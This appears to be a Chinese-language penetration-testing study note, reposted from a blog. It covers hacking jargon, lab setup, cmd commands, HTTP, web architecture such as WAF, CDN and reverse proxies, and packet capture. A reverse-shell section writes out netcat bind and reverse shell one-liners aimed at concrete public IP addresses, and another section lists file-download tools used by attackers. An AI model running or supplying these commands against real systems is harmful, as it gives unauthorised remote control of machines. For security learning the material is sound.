渗透测试前置知识

1. 肉鸡：是指被我们控制而不被对方发觉，可以随意操作的电脑或服务器
2. 木马：伪装成正常程序，获取控制权限
3. 黑页：现在一般很少会做这种相对脑残的行为
4. 挂马：在别人网页中注入木马，使浏览者中马
5. 大马：功能强大的网页后门，能操作文件、执行命令、操作数据库
6. 小马：功能比较单一的网页后门，一般是上传保存大马
7. 后门：
8. 拖库：从数据库导出数据，也指被黑客导出数据库数据
9. 社工库：黑客把用户数据整合分析，集中归档到的一个地方
10. 撞库：黑客获取到用户账号密码时，批量登入其他网站，得到一系列网站的用户信息，可理解为撞库攻击
11. 提权：黑客专用名词，提高服务器中的权限，一般用于网站和系统入侵
12. 网络钓鱼：通过伪造web站点骗取用户的账号密码
13. rootkit：攻击者用于隐藏行踪和保留root访问权限的工具
14. 弱口令：指那些强度不够，容易被猜解的口令（密码）如123、abc
15. shell：指的是一种命令行环境，如我们的win+R>cmd的小黑窗口
16. 交互shell：指shell等待你的输入，并且执行你的命令
17. 注入：
18. 注入点：可以实行注入的地方，通常是一个访问数据库的连接
19. 内网：通俗来说是局域网，如网吧、校园、公司
20. 外网：直接连入互联网，可以与互联网上的任意一台电脑相互访问
21. 端口：相当于一种数据传输的通道，用于接收某些数据，然后传输给相应的服务。电脑将这些数据处理后再通过开启的端口传输给对方
22. TCP/IP：是一种通信协议，规范了互联网上所有的通信设备，尤其是一台主机和另一台主机之间的数据往来格式及传送方式。是Internet的基础协议，也是一种电脑数据打包和寻址的标准方法
23. 脚本注入攻击：
24. IP地址：为了能够识别Internet上不同的电脑，Internet上每一台主机都分配有一个唯一的32位地址，由四个数值部分组成，每个数值为0~255
25. UDP：中文名为用户报协议，参考模型中一种无连接的传输层协议，提供面向事务的简单不可靠信息传送服务
26. TCP协议：传输控制协议是一种面向连接的、可靠的、基于字节流的传输层通信协议
27. TFTP：简单文件传输协议
28. ICMP协议：
29. DNS协议：用于将域名解析到IP地址的协议，也可将IP地址转换成域名
30. root：Unix里最高权限的用户，也就是超级管理员
31. LAN：局域网，链接近距离的计算机
32. 渗透：就是通过扫描检测你的网络设备及系统有没有安全漏洞，渗透成功就是系统被入侵
33. IDS：
34. VPN：虚拟专用网，在公用网络上建立专用网，进行加密通讯，通过对数据包的加密和数据包目标地址的转换实现远程访问
35. 网关：通常指路由器、防火墙、IDS、VPN等边界网络设备
36. WAF：web应用防火墙，通过一系列针对HTTP/HTTPS的安全策略来专门为web应用提供保护的一款产品
37. 爬虫：网络爬虫是按照一定规则，自动抓取万维网信息的脚步或程序

靶场环境搭建

虚拟机

虚拟机指通过软件模拟的具有完整硬件系统功能的，运行在一个完全隔离环境中的完整计算机系统
可在VMware官网进行下载

许可证（序列号）百度即可

创建虚拟机






第一次安装可以给大点
若出现拒绝访问，则右键虚拟机以管理员身份运行即可
MSDN下载windows镜像文件

复制链接到迅雷快速下载

导入镜像文件

可拍摄快照便于以后初始化
安装VMware Tools用于虚拟机与本机交互

默认下一步就行了

phpstudy

该程序包集成最新的Apache+PHP+MySQL+phpMyAdmin一次性安装，无须配置即可使用，是非常方便、好用的PHP调试环境。该程序不仅包括PHP调试环境，还包括了开发工具、开发手册等。

windows基础

常用端口以及对应服务

端口	服务
21	ftp
23	telnet
80	web
80-90	可能是web
442	SSL心脏滴血以及一些web漏洞测试
445	SMB
1433	MSSQL
3306	MYSQL
3389	远程桌面
5900	vnc
8080	tomcat/WDCP主机管理系统，默认弱口令
8888	amh/LuManager/宝塔 主机管理系统默认端口

常用的cmd命令
打开命令窗口（shift + 右键 ）创建的文件都会在桌面显示

命令	作用
d:	跳转到其他硬盘
D：	进入D盘
cd\	跳转到硬盘的根目录
dir	查看当前目录下的文件
md 目录名（文件夹）	创建目录文件夹
rd 目录名（文件夹）	删除目录文件夹
ipconfig	当前网络状态，ip配置，IPv4地址就是本机IP
ipconfig /all	可以把所有信息都打印出来
cls	清除cmd屏幕
copy	复制、拼接文件
move	移动文件
ren	重命名（ren 4.txt 5.txt）
del 文件1 文件2 ···	删除文件
type	显示文本文件的内容
find	查询
tasklist	显示任务列表
taskkill	终止进程
start	开始一个进程
systeminfo	显示整个系统的信息
logoff	注销账户
shutdown	关机

• copy：

copy 1.txt Dasktop\2.txt（把1.txt复制到桌面更名为2.txt）
cop 1.txt+2.txt 3.txt（拼接1.txt和2.txt内容到3.txt）

• ping：

 -t                Ping 指定的主机，直到停止若要查看统计信息并继续操作，请键入 Ctrl+Break；若要停止，请键入 Ctrl+C-a             将地址解析为主机名-n count       要发送的回显请求数-l size        发送缓冲区大小-f             在数据包中设置“不分段”标记(仅适用于 IPv4)-i TTL         生存时间-v TOS         服务类型(仅适用于 IPv4。该设置已被弃用对 IP 标头中的服务类型字段没有任何影响)-r count       记录计数跃点的路由(仅适用于 IPv4)-s count       计数跃点的时间戳(仅适用于 IPv4)-j host-list   与主机列表一起使用的松散源路由(仅适用于 IPv4)-k host-list    与主机列表一起使用的严格源路由(仅适用于 IPv4)-w timeout     等待每次回复的超时时间(毫秒)-R             同样使用路由标头测试反向路由(仅适用于 IPv6)根据 RFC 5095，已弃用此路由标头如果使用此标头，某些系统可能丢弃回显请求-S srcaddr     要使用的源地址-c compartment 路由隔离舱标识符-p             Ping Hyper-V 网络虚拟化提供程序地址-4             强制使用 IPv4-6             强制使用 IPv6

shoudown：

没有参数        显示帮助。这与键入 /? 是一样的。/?         显示帮助。这与不键入任何选项是一样的。/i         显示图形用户界面(GUI)。这必须是第一个选项。/l         注销。这不能与 /m 或 /d 选项一起使用。/s         关闭计算机。/r         完全关闭并重新启动计算机。/g         完全关闭并重新启动计算机。在重新启动系统后，重新启动任何注册的应用程序。/a         中止系统关闭。这只能在超时期间使用。/p         关闭本地计算机，没有超时或警告。可以与 /d 和 /f 选项一起使用。/h         休眠本地计算机。可以与 /f 选项一起使用。/hybrid    执行计算机关闭并进行准备以快速启动。必须与 /s 选项一起使用。/e         记录计算机意外关闭的原因。/o         转到高级启动选项菜单并重新启动计算机。必须与 /r 选项一起使用。/m \\computer 指定目标计算机。/t xxx     将关闭前的超时时间设置为 xxx 秒。有效范围是 0-315360000 (10 年)，默认值为 30。如果超时时间大于 0，则默示为/f 参数。/c "comment" 有关重新启动或关闭的原因的注释。最多允许 512 个字符。/f         强制关闭正在运行的应用程序而不事先警告用户。如果为 /t 参数指定大于 0 的值，则默示为 /f 参数。
/d [p|u:]xx:yy  提供重新启动或关闭的原因。p 指示重新启动或关闭是计划内的。u 指示原因是用户定义的。如果未指定 p 也未指定 u，则重新启动或关闭是计划外的。xx 是主要原因编号(小于 256 的正整数)。yy 是次要原因编号(小于 65536 的正整数)。

• taskkill：

/S system 指定要连接到的远程系统。/U [domain\]user 指定应该在哪个用户上下文执行这个命令:/P [password] 为提供的用户上下文指定密码。如果忽略，提示输入/F 指定要强行终止的进程/FI filter 指定筛选进或筛选出查询的的任务/PID process id 指定要终止的进程的PID（tasklist可看pid）/IM image name 指定要终止的进程的映像名称。通配符 '*'可用来指定所有映像名/T Tree kill: 终止指定的进程和任何由此启动的子进程

网络基础

HTTP协议

HTTP协议之URL

锚点的作用是快速跳到想要的地方

HTTP协议请求方法

请求方式	效果
GET	向指定资源发出请求
HEAD	和GET一样，但是不传回所有资源内容
POST	向指定资源提交数据，数据被包含在请求中
PUT	向指定位置上传
DELETE	删除所标识的资源
OPTIONS	可使服务器传回该资源所支持的所有HTTP请求方法，用* 来代替资源名称，向web服务器发送OPTIONS请求，可以测试服务器功能是否正常运行

HTML 标签的 method 属性

GET方法请求

  <body><form method="get"><p>姓名<input type="text" name="name"></p><input type="submit" value="提交" /></form></body>

提交的东西会直接显示在URL里，这样是非常不安全的
post请求的数据都包含在请求体里了，不会直接显示，网页检查，表标头或负载中可查看提交的内容


HTTP协议状态码

状态码	作用
1xx	指示信息–请求已接收，继续处理
2xx	成功–表示请求已被成功接收、理解、接收
3xx	重定向–要完成请求必须进行进一步操作
4xx	客户端错误–请求有语法错误或请求无法实现
5xx	服务器端错误–服务器未能实现合法的请求

常见的状态码

状态码	-
200 OK	客户端请求成功
400 Bad Request	客户端请求有语法错误，不能被服务器所理解
401 Unauthorized	请求未经授权，这个状态码必须和WWW-Authenticate报头域一起使用
403 Forbidden	服务器收到请求，但是拒绝提供服务
404 Not Found	请求资源不存在，eg：输入了错误的URL 500 internal Server Error//服务器发生不可预期的错误
503 Server Unavailable	服务器当前不能处理客户端的请求，一段时间后可恢复正常

web应用/架构搭建/站库分离/路由访问

web四大件-系统

web四大件分为系统件、中间件、数据库、源码
web可以在本地搭建，或者在服务器搭建，又分为在不同系统上搭建，比如window、linux等等

购买服务器搭建网站

• 购买域名：阿里云域名注册
• 购买服务器： https://ecs.console.aliyun.com/home，选择按量付费
  购买成功后，我们访问阿里云即可看到我们的服务器，点击远程连接即可连接，也可以直接通过本地电脑的远程连接输入服务器的ip和密码来连接使用
• 打开域名控制台，找到自己的域名，点击解析，记录类型为A，主机记录随便写，记录值为上面window server服务器的公网ip

网站的三种模式

• 子域名模式
  子域名是主域名的下一级域名，通常是大型公司为了满足不同产品或业务需求在主域名基础上发展而来，一般根据不同用途在主域名前面加上不同的前缀，根据数量有可分为二级域名、三级域名

如www.example.com、mai.example.coml就是example.com这个主域名的二级子域
名如果在二级子域名前面再加一个前缀，就成为三级子域名，如a.www.example.com
、b.www.example.com等

• 端口模式

网站默认为80端口，不加端口号也可直接访问
可以通过不同的端口号访问不同的系统，如果更换其他端口，访问时必须加上端口号
格式为域名：端口号

• 目录模式

域名a和域名b可以部署两套不同的程序，通过更换域名的目录，即可
访问不同的程序

• 其他模式

集成软件
Docker容器
分配站：例如博客站的每个用户都会分配一个网站供自己使用

web程序源码
三种模式

开源  --> 分为 源码可看/ 闭源（加密语言特性）
商业
自写

web四大件-中间件

常见的中间件配置包括目录权限、身份验证、解析规则，在日常的攻防中，当我们访问某个文件受阻的时候，就要考虑是不是某个中间件配置生效了

web四大件-数据库

我们打开某个网站，该网站的文章、动态、配置、我们的用户名和密码都是存储在数据库中\n\n数据库有以下几种常见模式：

• 本地储存
  网站和数据库储存在同一个服务器之中，如果数据库放在本地，那么拿到了网站的数据，一般也能拿到数据库的数据
• 站库分离
  网站和数据库不在同一个服务器中，网站访问数据库通过远程连接等方式，比如网站存储在A服务器，数据库存储在B服务器，每次客户请求数据时，A服务器从B服务器获取内容，如果是站库分离的网站，拿到了网站的数据，也不一定能拿到数据库
• 云数据库
  云数据库是近几年兴起的一个产品，简单来说就是把数据库存储在云端上，常见的有阿里云数据库和腾讯云数据库，相比传统的服务器，云安全系数更高，登录方式和安全组等安全配置更加复杂，还包含在线统计和分析等特色功能，同云数据库相似的还有OSS，网站文件不在存储在本地，而是存储在OSS中，OSS只做存储使用，不会执行我们上传的后门

web四大件-源码

网站的源码分为以下几种类型，如果拿到源码就可以进行白盒测试-代码审计

• 商业
• 自用
• 开源
  源码可见，一些大公司的公开项目的源码一般是可见的
  源码不可见，比如GitHub和Gitee中开源的付费项目项目大多是源码不可见的，有的
  是通过代码加密来实现，也有的是语言特性决定的

路由访问

访问一般有两种方式，普通的路径访问和路径访问，有些网站项目无法通过路径访问，比如java的web-inf文件，URL和文件目录对应不上，这种的需要配置路由才能访问某个网站
路径又分为相对路径和绝对路径，简单来说绝对路径就是某个文件的完整路径，相对路径就是该文件相当于当前位置的路径，我们在日常攻防网站中如果无法获取到绝对路径，就可以通过绝对路径来获取文件

web架构/前后端分离/建站分配

常规化
原理：源码和数据库存在于一个服务器
影响：无，常规安全测试手法

站库分离
原理：源码和数据库在不同的服务器上
存储：其他服务器上数据库，云数据库产品
影响：数据被单独存放，能连接才能影响数据

前后端分离
原理：前段JS框架，API接口传输数据
影响：

1. 前段页面大多数不存在漏洞
2. 要数据传输时，从后端影响
3. 后台管理在另外一个域名，安全性提高
4. 获得权限有可能不影响后端

宝塔+phpstudy
原理：虚拟化集成环境，配置权限受控制
影响：攻击者权限对比，宝塔搭建的网站较安全，phpstudy搭建的网站不安全

建站分配站

1. 托管
2. 申请
   原理：利用别人的域名模版建站
   影响：实质安全测试非目标资产，实际上测试的是平台

静态：
原理：数据没有传输性（jd传输不算）
影响：无漏洞
伪静态：
动态转为静态，伪装的静态

Web架构/OSS存储/CDN加速/反向代理

WAF

原理：Web应用防火墙，旨在提供保护
影响：常规Web安全测试手段会受到拦截
演示：免费D盾防护软件
Windows2012 + IIS +D盾

CDN

原理：内容分发服务，如选择全球范围，会在多个地方设置节点，访问时就近选择节点，提高访问速度
影响：会隐藏真实源IP，看到的只是节点而非真时目标，导致对目标测试错误
演示：阿里云备案域名全局CDN加速服务
Windows2012 + BT宝塔面板 + CDN服务

OSS

原理：云存储服务，旨在提高访问速度
为什么要使用第三方存储？
1.静态文件会占用大量带宽
2.加载速度
3. 存储空间
影响：
上传的文件或解析的文件均来自于OSS资源，无法解析，单独存储
1、修复上传安全
2、文件解析不一样
3、但Accesskey隐患

反向代理

正向代理为客户端服务,客户端主动建立代理访问目标（不代理不可达）
反向代理为服务端服务,服务端主动转发数据给可访问地址（不主动不可达）
原理：通过网络反向代理转发真实服务达到访问目的
影响：访问目标只是一个代理，非真实应用服务器
注意：正向代理和反向代理都是解决访问不可达的问题，但由于反向代理中多出一个可以重定向解析的
功能操作，导致反代理出的站点指向和真实应用毫无关系！

APP架构

原生开发

安卓一般使用java语言开发，当然现在也有kotlin语言进行开发。如何开发就涉及到具体编程了，这里就不详说了。简单描述就是使用安卓提供的一系列控件来实现页面，复杂点的页面可以通过自定义控件来实现

使用H5语言开发

使用H5开发的好处有很多，可多端复用，比如浏览器端，ios端，当然H5开发的体验是没有原生好的。结合我做过的项目来说，一般是这个页面需要分享出去的话，就用H5开发

使用flutter开发

flutter是近年来谷歌推出的一款UI框架，使用dart语言进行开发，支持跨平台，weight渲染直接操作硬件层，体验可媲美原生。但是flutter技术比较新，生态还不完善，开发起来效率相对偏低

常规Web开发

Web App软件开发简单地说，就是开发一个网站，然后加入app的壳。Web App一般非常小，内容都是app内的网页展示，受制于网页技术本身，可实现功能少，而且每次打开，几乎所有的内容都需要重新加载，所以反应速度慢，内容加载过多就容易卡死，用户体验差，而且app内的交互设计等非常有效。但开发周期长端，需要的技术人员少，成本低

#APP-开发架构-原生态-IDEA
演示：remusic项目源码
安全影响：反编译&抓包&常规测试
安全影响：逆向的角度去分析逻辑设计安全#APP-开发架构--Web封装-封装平台
演示：ShopXO源码程序+一门APP打包
安全影响：常Web安全测试#APP-开发架构-H5&Vue-HBuilderX
演示：HBuilderX案例
安全影响：API&JS框架安全问题&JS前端测试#WX小程序-开发架构-Web封装-平台
演示：ShopXO源码程序+一门APP打包
安全影响：常规Web安全测试

反弹SHELL/文件下载

基本渗透命令：渗透测试常用命令

文件上传下载
解决无图形化文件上传，解决数据传输
命令生成：棱角社区
Linux：wget curl python ruby perl java等
Windows：PowerShell Certutil Bitsadmin msiexec mshta rundll32等

反弹shell命令

解决数据回显&解决数据通讯
命令生成：https://forum.ywhack.com/shell.php
1、正向连接：本地监听等待对方连接
Linux控制Windows
//绑定CMD到本地5566端口
nc -e cmd -lvp 5566
//主动连接目标5566
ncat 47.122.23.131 5566Windows控制Linux
//绑定SH到本地5566端口
ncat -e /bin/sh -lvp 5566
//主动连接目标5566
nc 47.94.236.117 55662、反向连接：主动给出去，对方监听
//绑定CMD到目标5566端口
ncat -e /bin/sh 47.122.23.131 5566
//等待5566连接
nc -lvvp 5566//绑定CMD到目标5566端口
nc -e cmd 47.94.236.117 5566
//等待5566连接
ncat -lvvp 5566

抓包技术

BurpSuite：
是用于攻击web 应用程序的集成平台，包含了许多工具。Burp Suite为这些工具设计了许多接口，以加快攻击应用程序的过程。所有工具都共享一个请求，并能处理对应的HTTP 消息、持久性、认证、代理、日志、警报

证书安装后才可抓到https

浏览器设置：代理设置

地址为BS里的代理地址

可用转发工具Proxifier配合bs使用（或者茶杯）
proxifier：
建立代理服务器
设置代理规则（进程筛选、ip域名筛选、端口筛选）

科来分析：应用分类筛选、应用进程筛选、网络接口ip筛选

渗透测试：抓包得到应用的资产信息、ip域名等ip和域名上面的服务做测试
（ web、端口、数据库、第三方软件等）

逆向破解：
1、反编译源码中去找资产信息，来到渗透测试思路一致
2、源码中泄露的配置key 去测试安全性
3、逆向代码和产品的设计逻辑安全 （不规范的加密、可以绕过的策略、自己删除验证打包绕过验证等）

web安全渗透测试基础知识相关推荐

1. WEB网络渗透的基础知识

   网络渗透 1.什么是网络渗透 网络渗透是攻击者常用的一种攻击手段,也是一种综合的高级攻击技术,同时网络渗透也是安全工作者所研究的一个课题,在他们口中通常被称为"渗透测试(Penetratio ...

2. 视频教程-Kali Linux渗透测试基础入门到进阶实战全程课-渗透测试

   Kali Linux渗透测试基础入门到进阶实战全程课 本人有多年的服务器高级运维与开发经验,擅长计算机与服务器攻防及网络攻防技术!对网络安全领域有持续的关注和研究! 林晓炜 ¥499.00 立即订阅 ...

3. 第一章 内网渗透测试基础

   本文章大部分内容来自于 <内网安全攻防:渗透测试实战指南>: https://item.jd.com/12743210.html 0x00 内网基础知识 内网也指局域网(Local Are ...

4. 软件测试整理一：测试基础知识以及开发、测试模型、按照开发阶段进行测试

   文章目录 一.基础概念 1.什么是软件测试 2.软件测试的目的 3.软件测试的原则 4.软件测试的分类 4.1 按照开发阶段分类 4.2 按照软件特性分类 4.3 按照测试技术分类 4.4 按照测试运 ...

5. 测试岗位面试前复习之【测试基础知识篇】

   测试基础知识篇 一.app测试相关 1.android与ios的app测试的区别: 2.app测试和web测试的重点: 3.性能测试考量的指标: 4.app的性能测试,需要重点关注哪些方面? 5.站在 ...

6. JMeter-01-性能测试基础知识介绍

   JMeter-01-性能测试基础知识介绍 开篇词 性能测试常见分类 Web服务的主要指标 前端页面的主要指标 数据库的主要指标 开篇词 参加工作这些年来,性能测试做过不少,主要用的LoadRunner ...

7. 《内网安全攻防：渗透测试实战指南》读书笔记（一）：内网渗透测试基础

   目录 前言 一.内网基础知识 1.工作组 2.域 3.活动目录 (1)活动目录的功能 (2)DC和AD区别 4.安全域的划分 (1)DMZ (2)内网 5.域中计算机的分类 6.域内权限 (1)组 ( ...

8. 渗透测试基础，初识渗透测试

   渗透测试基础 1.渗透测试的概念 2.安全术语介绍 3.HTTP协议讲解 概述 HTTP URL HTTP响应头 HTTP头中安全隐患 HTTP请求方法 HTTP响应码 4.HTTPS协议 1.渗透测 ...

9. 软件测试52讲 - 笔记（一）- 测试基础知识

   测试基础知识 01 | 你真的懂测试吗?从"用户登录"测试谈起 总结 案例 功能 测试用例 基础功能用例(基于等价类和边界值设计) 可添加功能用例(经验型) 安全性用例 性能用例 ...

最新文章

1. 四 Vue学习 router学习
2. ICCV 2019 | 无需数据集的Student Networks
3. JDK源码解析 迭代器模式在JAVA的很多集合类中被广泛应用，接下来看看JAVA源码中是如何使用迭代器模式的。
4. java从键盘输入数据斐波那契数_从键盘输入一个正整数n，打印出斐波那契数列的前n个元素...
5. MySQL探秘(二)：SQL语句执行过程详解
6. bmp文件格式_一次性解决CAD转换成BMP格式图片的问题
7. bool python 运算_python基础知识和pycharm安装
8. [Luogu 2486] SDOI2011 染色
9. C++|Qt中QTreeWidget基本操作及完整代码下载
10. html判断输入是否为空格,javascript怎么判断是否为空格？
11. 降价到心痛也无人问津！这款手机成绝唱...
12. linux进程跑飞了,【Shell】Linux信号（二）
13. Java-网络编程总结（转载）
14. PyTorch学习笔记——词向量简介
15. 人工智能深度学习Caffe框架介绍
16. wma转mp3怎么弄_wma格式怎么转换mp3
17. Android之使用通知栏通知的三种方法（短内容、长内容、图片通知）
18. Poco C++类库使用说明
19. 史上最全的鸿蒙学习资料——润和满天星系列Pegasus资料汇总
20. 第三章 国外信托公司业务

热门文章

1. 巨杉数据库SequoiaDB特性
2. 首次使用计算机 鼠标没反应,鼠标没反应,教您怎么解决鼠标没反应
3. linux支持10代intel主板,intel十代酷睿搭配什么主板 10代cpu需要换主板吗
4. Python爬虫：通过爬取CSDN博客信息，学习lxml库与XPath语法
5. 怎么取消苹果手机自动续费_苹果手机如何取消连续订阅自动续费
6. Git-命令行-删除本地和远程分支
7. 【大数据哔哔集20210112】Sorry，Hbase的LSM Tree真的可以为所欲为！
8. 基于FATFS的SD卡存储
9. 计算机网络05：传输层
10. 汽车加油问题(动态规划)